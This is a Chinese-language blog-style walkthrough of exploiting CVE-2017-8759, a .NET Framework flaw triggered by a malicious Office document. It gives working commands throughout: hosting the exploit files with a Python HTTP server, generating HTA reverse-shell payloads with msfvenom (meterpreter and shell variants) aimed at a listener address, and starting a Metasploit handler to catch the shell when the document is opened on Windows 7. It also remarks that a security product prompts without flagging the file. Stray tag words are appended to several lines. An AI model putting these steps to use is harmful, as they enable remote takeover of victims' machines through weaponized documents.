近日,360集團核心安全事業部分析團隊發現一個新型的Office文檔高級威脅攻擊,攻擊使用了9月12日補丁剛修復的.NET Framework漏洞,該漏洞在野外被利用時爲0day狀態,用戶打開惡意的Office文檔就會中招。該漏洞的技術原理和今年黑客「奧斯卡」Pwnie Awards上的最佳客戶端漏洞(CVE-2017-0199)一模一樣,不一樣的是,此次黑客在Offcie文檔中嵌入新的Moniker對象,利用的是.net庫漏洞,在Office文檔中加載執行遠程的惡意.NET代碼,而整個漏洞的罪魁禍首競是.NET Framework一個換行符處理失誤。html
影響範圍:python
Microsoft .NET Framework 4.6.2
Microsoft .NET Framework 4.6.1
Microsoft .NET Framework 3.5.1
Microsoft .NET Framework 4.7
Microsoft .NET Framework 4.6
Microsoft .NET Framework 4.5.2
Microsoft .NET Framework 3.5
Microsoft .NET Framework 2.0 SP2git
exploit-sample地址:https://github.com/Voulnet/CVE-2017-8759-Exploit-samplegithub
將文件下載下來,打開所在的文件夾,在當前文件夾建立一個命令行,運行:
python -m SimpleHTTPServer 8080
shell
這個時候咱們已經在本地的8080端口建立了一個服務器了windows
而後打開doc文件,啓用編輯,就會彈出畫圖工具,漏洞驗證成功安全
環境說明:服務器
word的宏tcp
exploit.txt 文件工具
cmd.hta文件
因此流程是:
word宏 ==》 exploit.txt ==》 cmd.hta
訪問文件
fn.hta是我用msfvenom生成的,具體命令以下
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.242.137 LPORT=7777 -f hta-psh -o /var/fn.hta
或者
msfvenom -p windows/x64/shell/reverse_tcp LHOST=192.168.242.137 LPORT=7777 -f hta-psh -o /var/fn.hta
虛擬機kali(192.168.242.137)啓動metasploit
use exploit/multi/handler set PAYLOAD windows/x64/shell/reverse_tcp set LHOST 192.168.242.137 set LPORT 7777 exploit
修改過宏的文檔在win7打開,反彈回來一個shell
打開word文檔的這個過程,360會進行提示但不是報毒,最後還會留下這麼一個窗口
至此,漏洞驗證到利用結束
這二者利用參考文章freebuf有:http://www.freebuf.com/sectool/90362.html
最後,參考文檔: